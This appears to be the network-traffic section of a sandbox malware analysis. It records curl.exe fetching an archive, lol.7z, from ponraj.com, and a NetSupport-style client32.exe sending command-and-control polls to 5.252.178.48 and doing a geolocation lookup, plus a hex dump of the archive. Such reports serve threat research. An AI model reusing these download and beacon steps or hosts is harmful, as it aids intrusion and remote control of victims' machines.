                                                                                                                                  Jul 18, 2023 17:37:08.508116007 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.508171082 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.508189917 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.508217096 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.508248091 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.508639097 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.508667946 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.508725882 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.508743048 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.508769989 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.508800030 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.510706902 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.510745049 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.510823011 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.510839939 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.510865927 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.510901928 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.511312008 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.511348009 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.511410952 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.511428118 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.511452913 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.511490107 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.511918068 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.511955023 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.512001038 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.512016058 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.512039900 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.512073994 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.512525082 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.512566090 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.512604952 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.512620926 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.512648106 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.512682915 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.512991905 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.513031960 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.513072968 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.513087988 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.513112068 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.513148069 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.513473988 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.513520956 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.513578892 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.513595104 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.513619900 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.513655901 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.513894081 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.513952971 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.513974905 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.513992071 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.514017105 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.514074087 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:08.514131069 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.524380922 CEST49721443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:08.524454117 CEST44349721188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:09.404854059 CEST49722443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:09.404911041 CEST44349722188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:09.405177116 CEST49722443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:09.422663927 CEST49722443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:09.422705889 CEST44349722188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:09.543149948 CEST44349722188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:09.543255091 CEST49722443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:09.546036005 CEST49722443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:09.546056986 CEST44349722188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:09.546580076 CEST44349722188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:09.565620899 CEST49722443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:09.612283945 CEST44349722188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:09.651326895 CEST44349722188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:09.651427984 CEST44349722188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:09.651541948 CEST49722443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:09.668488026 CEST49722443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:09.668526888 CEST44349722188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:13.982577085 CEST49723443192.168.2.55.252.178.48
                                                                                                                                  Jul 18, 2023 17:37:13.982626915 CEST443497235.252.178.48192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:13.982697010 CEST49723443192.168.2.55.252.178.48
                                                                                                                                  Jul 18, 2023 17:37:14.375973940 CEST49723443192.168.2.55.252.178.48
                                                                                                                                  Jul 18, 2023 17:37:14.376032114 CEST443497235.252.178.48192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:14.376126051 CEST443497235.252.178.48192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:16.571000099 CEST4972480192.168.2.562.172.138.67
                                                                                                                                  Jul 18, 2023 17:37:16.613445044 CEST804972462.172.138.67192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:16.613622904 CEST4972480192.168.2.562.172.138.67
                                                                                                                                  Jul 18, 2023 17:37:16.762129068 CEST4972480192.168.2.562.172.138.67
                                                                                                                                  Jul 18, 2023 17:37:16.808990002 CEST804972462.172.138.67192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:16.809086084 CEST4972480192.168.2.562.172.138.67
                                                                                                                                  Jul 18, 2023 17:39:04.327872992 CEST4972480192.168.2.562.172.138.67
                                                                                                                                  Jul 18, 2023 17:39:04.370074987 CEST804972462.172.138.67192.168.2.5
                                                                                                                                  Jul 18, 2023 17:39:04.370198965 CEST4972480192.168.2.562.172.138.67

                                                                                                                                  UDP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Jul 18, 2023 17:37:05.762547970 CEST6145253192.168.2.58.8.8.8
                                                                                                                                  Jul 18, 2023 17:37:05.798310041 CEST53614528.8.8.8192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:07.858429909 CEST6532353192.168.2.58.8.8.8
                                                                                                                                  Jul 18, 2023 17:37:07.878695965 CEST53653238.8.8.8192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:09.362327099 CEST5148453192.168.2.58.8.8.8
                                                                                                                                  Jul 18, 2023 17:37:09.384577036 CEST53514848.8.8.8192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:15.869107008 CEST6344653192.168.2.58.8.8.8
                                                                                                                                  Jul 18, 2023 17:37:15.904019117 CEST53634468.8.8.8192.168.2.5

                                                                                                                                  DNS Queries

                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                  Jul 18, 2023 17:37:05.762547970 CEST192.168.2.58.8.8.80xc404Standard query (0)ponraj.comA (IP address)IN (0x0001)false
                                                                                                                                  Jul 18, 2023 17:37:07.858429909 CEST192.168.2.58.8.8.80x4db3Standard query (0)ponraj.comA (IP address)IN (0x0001)false
                                                                                                                                  Jul 18, 2023 17:37:09.362327099 CEST192.168.2.58.8.8.80xbf22Standard query (0)ponraj.comA (IP address)IN (0x0001)false
                                                                                                                                  Jul 18, 2023 17:37:15.869107008 CEST192.168.2.58.8.8.80x6396Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false

                                                                                                                                  DNS Answers

                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                  Jul 18, 2023 17:37:05.798310041 CEST8.8.8.8192.168.2.50xc404No error (0)ponraj.com188.127.225.160A (IP address)IN (0x0001)false
                                                                                                                                  Jul 18, 2023 17:37:07.878695965 CEST8.8.8.8192.168.2.50x4db3No error (0)ponraj.com188.127.225.160A (IP address)IN (0x0001)false
                                                                                                                                  Jul 18, 2023 17:37:09.384577036 CEST8.8.8.8192.168.2.50xbf22No error (0)ponraj.com188.127.225.160A (IP address)IN (0x0001)false
                                                                                                                                  Jul 18, 2023 17:37:15.904019117 CEST8.8.8.8192.168.2.50x6396No error (0)geo.netsupportsoftware.comgeography.netsupportsoftware.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jul 18, 2023 17:37:15.904019117 CEST8.8.8.8192.168.2.50x6396No error (0)geography.netsupportsoftware.com62.172.138.67A (IP address)IN (0x0001)false
                                                                                                                                  Jul 18, 2023 17:37:15.904019117 CEST8.8.8.8192.168.2.50x6396No error (0)geography.netsupportsoftware.com51.142.119.24A (IP address)IN (0x0001)false
                                                                                                                                  Jul 18, 2023 17:37:15.904019117 CEST8.8.8.8192.168.2.50x6396No error (0)geography.netsupportsoftware.com62.172.138.8A (IP address)IN (0x0001)false

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • ponraj.com
                                                                                                                                  • 5.252.178.48connection: keep-alivecmd=pollinfo=1ack=1
                                                                                                                                  • geo.netsupportsoftware.com

                                                                                                                                  HTTP Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  0192.168.2.549720188.127.225.160443C:\Windows\System32\curl.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  1192.168.2.549721188.127.225.160443C:\Windows\System32\curl.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  2192.168.2.549722188.127.225.160443C:\Windows\System32\curl.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  3192.168.2.5497235.252.178.48443C:\ProgramData\client32.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jul 18, 2023 17:37:14.375973940 CEST3008OUTPOST http://5.252.178.48/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 5.252.178.48Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                                                  Data Raw:
                                                                                                                                  Data Ascii:


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  4192.168.2.54972462.172.138.6780C:\ProgramData\client32.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jul 18, 2023 17:37:16.762129068 CEST3010OUTGET /location/loca.asp HTTP/1.1
                                                                                                                                  Host: geo.netsupportsoftware.com
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Jul 18, 2023 17:37:16.808990002 CEST3010INHTTP/1.1 200 OK
                                                                                                                                  Cache-Control: private
                                                                                                                                  Content-Type: text/html; Charset=utf-8
                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Set-Cookie: ASPSESSIONIDCSATSCSC=JIJDKNLCFFOHONKLFLHJGAGG; path=/
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                  strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  Date: Tue, 18 Jul 2023 15:37:16 GMT
                                                                                                                                  Content-Length: 15
                                                                                                                                  Data Raw: 34 37 2e 31 37 37 32 2c 38 2e 34 32 37 31 39
                                                                                                                                  Data Ascii: 47.1772,8.42719


                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  0192.168.2.549720188.127.225.160443C:\Windows\System32\curl.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2023-07-18 15:37:06 UTC0OUTGET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lol.7z HTTP/1.1
                                                                                                                                  Host: ponraj.com
                                                                                                                                  User-Agent: curl/7.55.1
                                                                                                                                  Accept: */*
                                                                                                                                  2023-07-18 15:37:06 UTC0INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Tue, 18 Jul 2023 15:37:06 GMT
                                                                                                                                  Content-Type: application/x-7z-compressed
                                                                                                                                  Content-Length: 2305650
                                                                                                                                  Connection: close
                                                                                                                                  Last-Modified: Sun, 16 Jul 2023 20:09:50 GMT
                                                                                                                                  ETag: "232e72-600a043abd65f"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  2023-07-18 15:37:06 UTC0INData Raw: 37 7a bc af 27 1c 00 04 b4 1d 66 47 2d 2e 23 00 00 00 00 00 25 00 00 00 00 00 00 00 2c 86 56 56 e0 1b b1 06 4e 5d 00 06 82 cb 94 d3 b9 af f7 1e d4 db db 26 fe 12 c2 40 84 0b ca 5a 74 41 a5 34 05 82 78 3d 69 f9 1a 84 68 af 35 e1 8b 55 42 68 d8 4b a5 de e9 e9 9e 4b 42 7d 22 47 41 bd cc 0e cb d2 0c 2e 18 9d db 78 b3 e6 e2 c7 e7 36 ff 63 8a 38 ec f2 56 ac 3e a9 8a 33 ba 33 a3 7e c2 dd a8 1e 62 8e af 58 c3 d3 08 ed f6 1b 57 d8 62 c6 f4 a1 77 f7 19 db ec 8d 75 62 51 00 a2 a3 68 5b fa b4 16 0d 60 bf cc 33 29 87 ac b4 91 3e cc a8 0a e2 ee 0f b7 55 05 96 4b 13 ec 59 e2 30 7d 28 ee 67 a3 a1 37 e2 84 d2 ab 62 72 77 92 c2 79 d5 ef 15 10 2f 33 7a cb 74 f6 de 9c 0d 2c d2 67 a5 40 f4 ac 92 61 4a c2 9d d1 7f 8e f8 99 30 4b 0c 96 12 aa c4 d2 d1 f2 27 51 d6 ec 06 9e f3 fd
                                                                                                                                  Data Ascii: 7z'fG-.#%,VVN]&@ZtA4x=ih5UBhKKB}"GA.x6c8V>33~bXWbwubQh[`3)>UKY0}(g7brwy/3zt,g@aJ0K'Q
                                                                                                                                  2023-07-18 15:37:06 UTC16INData Raw: 4c 0e 87 29 75 21 94 76 df 87 83 55 67 c8 2e d3 a8 28 be 26 2d 66 25 cf 34 90 d8 83 cc a4 f4 93 b7 3c 5d f5 1f e3 09 8c dd ba 4d df 66 42 34 7b 57 e4 a2 dc 61 f2 e9 1f 2d 28 3a 44 5b 71 17 12 97 51 b3 53 6e 97 7e fe 71 5f 41 7e 4a 83 f7 1a 72 91 58 64 d1 5a ab 81 a1 cb 3e a7 e4 ca b5 8b fd 37 57 55 bb 31 cc 3c 94 4a 07 dd 15 c1 36 e1 2a 40 be c6 b7 2b f9 0e e2 80 af 5f 67 3c 8e 8c 78 27 95 40 09 5e cd b8 d3 0f f8 9f 35 c5 e9 3d 53 d7 b1 94 bf 99 8f 3a 92 0e c9 a2 60 88 ad f1 40 3d 6c de 87 c3 89 2f 4c d0 18 bd 41 db 55 9a 77 ee a3 88 75 ab 38 33 0f 15 18 4e 4d 77 54 23 7c 71 6f 81 45 85 e8 d2 16 b6 7f 66 2a 88 3f a2 d0 61 dc 4d 31 83 9f d5 05 86 06 e5 c4 30 4c 38 4e 24 81 75 d2 f9 c5 4e ed b2 2c 00 6e a7 30 e8 0b c1 27 81 4f 11 34 10 e7 25 dd a0 4e 26 34
                                                                                                                                  Data Ascii: L)u!vUg.(&-f%4<]MfB4{Wa-(:D[qQSn~q_A~JrXdZ>7WU1<J6*@+_g<x'@^5=S:`@=l/LAUwu83NMwT#|qoEf*?aM10L8N$uN,n0'O4%N&4
                                                                                                                                  2023-07-18 15:37:06 UTC32INData Raw: e5 eb 63 5b c7 27 ac 4b 0c 85 27 5c b3 a3 54 d9 97 26 eb a6 d0 24 e0 aa ac 60 d9 36 ca 7b 23 85 0e 6c 16 dc 46 ae c1 66 e5 b6 ba 01 08 c6 3b 0c 22 a4 1d 17 50 46 a3 a2 ff 3c d0 4b eb 1a fd 93 48 7a 0b 0a 69 b6 99 8c f6 7e 18 17 32 8b 7c ee 9f 35 54 23 43 ec c7 52 ca 71 b8 95 54 ed 5d 84 ad c0 64 72 3a c4 ad 8a 4f da 88 25 92 12 0a 67 a5 5a 9e af 66 f2 55 ba be 51 c5 b6 ac 12 47 d1 b1 b1 ce 3f 2d d8 43 b6 58 92 e8 33 6c fe 9a fa 8a cb 62 e3 23 99 1c 8b c9 bd 14 66 e9 97 41 06 75 32 c6 0e fe 70 bd 5a 90 71 0b c7 c1 d4 43 2c 2e 60 89 02 0d 27 af c1 f5 0c d2 c6 c7 ac ca 81 de de 6d ea 75 1c a0 18 2c ea 29 fe 6e 0c d6 16 ee 59 ba a1 02 8d 8a ed 91 ca e9 7c 06 9a 29 de 5b f1 8d 5f b3 ca e0 f9 b4 a6 a1 c2 7d 2b b2 41 6a b5 f1 85 e4 3f 94 16 5b 0a f9 10 c8 5e b8
                                                                                                                                  Data Ascii: c['K'\T&$`6{#lFf;"PF<KHzi~2|5T#CRqT]dr:O%gZfUQG?-CX3lb#fAu2pZqC,.`'mu,)nY|)[_}+Aj?[^
                                                                                                                                  2023-07-18 15:37:06 UTC48INData Raw: 19 11 d3 36 98 c2 24 f5 35 f6 12 49 ca 4b 7e 50 f5 35 b0 c8 22 ea 95 d7 46 7d 66 c6 39 4c 35 e1 b1 24 84 f7 59 fb 21 26 52 6f 9d 37 ec a8 46 b0 eb 60 f6 c0 a0 f8 a8 41 b5 a0 da dd b4 ab 80 b6 ff 3d 1d b2 c6 f6 7d ea 96 c0 18 ca 0c 2c c5 74 28 0d 77 69 db 2d cb 2f 33 27 86 d3 e5 e6 66 b3 ee ac 66 07 22 99 1a 47 83 56 d4 24 8b a7 91 2f d5 b8 23 8e 52 75 67 96 34 6d 00 46 90 dc 99 37 52 72 cc 85 2b 22 65 71 a9 f9 4d 2b 16 3b 44 80 dc d9 4e 65 3d a9 24 4f b5 3d fd 12 5d 27 aa 64 f7 5d 6b 0b cb 5c c4 6d de 19 03 65 98 60 0d c6 f6 ad ae 3f 8c a0 38 87 1b 14 6a 4e 7b 5a f1 f0 bd b9 00 c5 c4 bc fa 60 ec 01 85 da 8d 4d 94 cd 61 25 78 a6 a9 5c 13 91 d8 a5 47 3e 5c 70 25 85 5e 9f ef 23 32 c8 d8 55 2c 3e 5a 0d 11 6a d6 9d 6e b0 12 a3 b1 17 bc 57 24 45 45 90 b1 84 c6
                                                                                                                                  Data Ascii: 6$5IK~P5"F}f9L5$Y!&Ro7F`A=},t(wi-/3'ff"GV$/#Rug4mF7Rr+"eqM+;DNe=$O=]'d]k\me`?8jN{Z`Ma%x\G>\p%^#2U,>ZjnW$EE
                                                                                                                                  2023-07-18 15:37:06 UTC64INData Raw: 34 0d 23 78 d7 84 ff a4 de 63 57 bd 2b 8b f1 bb f4 2f ec 54 fe 0d 25 24 d6 30 b0 a9 70 f1 05 bb f4 b3 e4 c7 50 f2 ac 65 4a dc 6b c2 03 1c 4a 62 f4 b3 4c cb 4e ed 12 cb 77 a3 85 d1 79 32 77 99 f4 d2 af 9a bc 0d 7f b9 7a 9d b6 28 c7 f8 c9 53 b5 31 03 5d ca 65 42 79 53 df 4f 91 06 6d 63 9a 28 81 68 a2 be c2 be 73 23 f4 76 2c e0 e9 04 0b 63 06 df b6 39 ba ba e8 f0 49 c6 90 0e 2e a6 39 53 ea 39 85 fe 6b 98 e7 8f fa 62 88 51 a5 e4 db 6b d8 55 68 05 13 e0 b7 a3 0f 81 f8 32 0b 82 57 a8 1d ff d0 3e f2 16 93 76 0f a8 b7 58 e3 d8 0d d1 01 b2 1f 64 d6 74 9b 94 8d 0b 2c 61 ca 5f c1 9b 25 1f 2c 45 c2 6a 66 9a 4f 76 83 0c 23 76 32 4d f2 f4 62 69 96 99 cd c4 5b fe a1 ff 78 71 29 b2 cc a0 95 ad 96 46 89 e8 d3 df fe 1d 6c 01 4a 2c 60 23 9c 15 fc 78 e7 c8 b8 4d 3e 4d e2 18
                                                                                                                                  Data Ascii: 4#xcW+/T%$0pPeJkJbLNwy2wz(S1]eBySOmc(hs#v,c9I.9S9kbQkUh2W>vXdt,a_%,EjfOv#v2Mbi[xq)FlJ,`#xM>M
                                                                                                                                  2023-07-18 15:37:06 UTC80INData Raw: 52 7b 66 bc 50 92 3f 5b 06 e1 25 ed f2 47 f1 76 50 31 d3 ae 49 85 15 81 4d 8f 3c 92 ce 0c 30 5d 6d af c5 a1 f4 79 46 7f 88 07 92 b2 0d 1c 33 f0 9b 7f be 3b 27 9e d2 15 be 77 4d 13 5b 67 30 45 61 b1 2c b1 07 40 13 1b 89 f2 ad d4 64 fe 18 63 54 4e 94 fd d0 1e 20 19 ba 70 69 40 d7 09 48 aa 36 77 cc 68 b5 4f 6c 8b ac f2 e1 8b 82 31 37 ef 39 60 57 c1 59 c6 57 eb 60 a4 fd e2 5b a2 54 73 d1 27 c5 23 78 13 d0 bd 6f e1 f3 0d a0 1f 85 f9 a4 22 70 e5 46 04 8e d5 38 67 0a 7d 6f c2 18 d9 e2 d7 be 45 10 0c 0a 95 b4 81 b8 97 39 60 59 18 29 89 8e a2 2b ae 31 27 59 b6 1e 65 4f a7 b4 a2 62 b1 f3 f4 84 49 7f 95 9e c5 78 fa 6b 52 7b e4 ad 98 4e 16 94 de 9b 94 b8 9b af ce 06 10 05 a9 dc 07 ff 8c 02 9f 05 46 5e 83 2b 7f ce 29 01 e9 95 12 29 99 bb 48 a1 f9 2a ec 3b 2b 32 5b 7f
                                                                                                                                  Data Ascii: R{fP?[%GvP1IM<0]myF3;'wM[g0Ea,@dcTN pi@H6whOl179`WYW`[Ts'#xo"pF8g}oE9`Y)+1'YeObIxkR{NF^+))H*;+2[
                                                                                                                                  2023-07-18 15:37:06 UTC96INData Raw: 79 a6 2e bf 31 3a 27 5e 30 59 2a 70 a3 e2 fc b2 7e 7c 3a 6c bd e0 08 a2 d3 b1 67 af 2d 5d 11 47 13 2b e7 18 73 dd 24 ad a3 82 2b b4 7b 1d bc df 59 2f c5 83 db d2 85 39 ae 65 28 7a 44 58 bb b7 5a d9 76 18 5f 6d b6 d3 43 fb fe a9 fc ae b1 a3 8c 8a 1d 73 d6 d5 cf 06 01 76 61 b6 5c 03 97 9c ed 18 3a c7 50 15 0c a4 b5 33 ec 91 cb 29 72 dc ba 68 c7 1a bc 32 f0 e6 a9 38 26 0e e7 d4 dc 19 3f 12 8f bd 73 88 20 30 7c 67 b2 e7 e6 33 e3 be fb 6e b2 22 2c 7c 37 5b d9 31 fe 9a 45 39 85 f6 2e 11 1b e2 88 82 e4 e1 78 72 28 e5 98 a7 97 23 2a 5f df 57 43 62 e9 49 b5 6d f0 85 c7 37 0e 5d 1f ef 4b 92 e0 e5 b0 a2 bf 32 a3 46 ac 01 77 54 cb f4 36 fa e3 d5 7d b5 15 69 da 99 3b b1 04 fe ee 23 9c a9 62 37 84 a5 7c 87 cb 4d 62 12 2e 7d 80 9e c7 57 67 1e f5 fd 41 35 91 91 70 01 a0
                                                                                                                                  Data Ascii: y.1:'^0Y*p~|:lg-]G+s$+{Y/9e(zDXZv_mCsva\:P3)rh28&?s 0|g3n",|7[1E9.xr(#*_WCbIm7]K2FwT6}i;#b7|Mb.}WgA5p
                                                                                                                                  2023-07-18 15:37:06 UTC112INData Raw: 45 b7 27 c2 b6 05 fe f0 8a ff 72 ac bc 3b e7 f4 09 c7 ff f0 01 64 aa 12 9e cd 89 2f 41 dd 7f 31 33 6a 56 99 ff 2e 87 de 99 1f 03 fb 4f 0c 7b 06 76 66 b6 55 8a 29 31 d5 33 45 e2 ec 48 0b 2a bb 12 5e bd 24 29 60 86 0a d5 43 3b 93 19 55 d5 57 68 63 a5 3e 1d d0 d7 38 00 dc 71 d8 94 7d 5f 11 2b 5f 81 3b 5d 6f ab f3 d0 cd 07 60 87 ee 2c cc 7f 51 76 c6 c0 7b 9d 9f 0a a8 e9 c2 5e bd 64 d9 2d 64 ab 67 a6 f9 d5 12 b6 bf 19 56 81 91 0d 5a f3 c2 2a 38 1a 67 4c 40 ef 00 56 1d 57 be d7 4d b7 e4 fc 62 4f 56 aa 61 a6 2a d6 d9 13 53 49 96 ea 71 e5 6d 98 68 5d ae b4 40 1e 02 86 5d ba fb 08 09 02 63 94 f6 8a ea 69 e5 a1 51 f3 09 64 e2 ac f7 5f 53 94 d3 7a fd bf 3d 75 0a a8 be a8 9b 6f 37 d4 82 37 2b 77 01 c2 3c 20 c6 26 be 3d 73 8c bb 11 ae 76 65 1e ba d4 18 ef b7 18 e2 4d
                                                                                                                                  Data Ascii: E'r;d/A13jV.O{vfU)13EH*^$)`C;UWhc>8q}_+_;]o`,Qv{^d-dgVZ*8gL@VWMbOVa*SIqmh]@]ciQd_Sz=uo77+w< &=sveM
                                                                                                                                  2023-07-18 15:37:06 UTC128INData Raw: 8c eb d5 41 59 d7 f8 77 6e ae 72 00 3e 89 59 fb b6 b6 b6 ed 2b 2b d9 2f fa bb 9d cc 2d fd 0c 9b 6c 94 ba bf a3 98 94 d5 c7 6c 9c 47 63 0d 68 86 57 1f 37 5d b8 91 47 be 9e 94 f0 2c 6f 60 39 f2 71 37 fd 0e 3a d3 97 9b cd 6b 6c 34 67 c6 5f 17 87 48 4f 18 c8 9f a6 f5 96 5a 36 74 d3 ff c7 da e4 13 52 eb 5d 9e 6b 91 80 61 c0 12 87 46 e0 32 65 ba db b3 90 46 5f f6 47 77 fe cf e4 df 81 76 41 c7 a8 ac 98 9f 09 58 2f 1f 23 4f e3 6b 8d b6 a4 a5 06 8c c9 d1 87 bd e2 7c b1 42 3d 23 c8 86 f5 ab 23 67 fd ae a2 d7 a6 dd 6d 5b 3e ac 32 17 6b 8e f4 35 3b 6c 51 6c a1 ac a7 4e 50 19 8b 7e 0a 22 9e a4 b8 f8 da 30 dd 03 30 57 fc 82 54 11 a6 72 d0 ac da a7 98 13 6d 1e fa 41 ba 0f 7c 2b e5 7a ac 75 72 7d b9 4e 8f 81 de 3c 57 06 67 e0 72 2a 28 4b 79 e2 cf 4b 12 d5 91 c1 5b 28 c5
                                                                                                                                  Data Ascii: AYwnr>Y++/-llGchW7]G,o`9q7:kl4g_HOZ6tR]kaF2eF_GwvAX/#Ok|B=##gm[>2k5;lQlNP~"00WTrmA|+zur}N<Wgr*(KyK[(
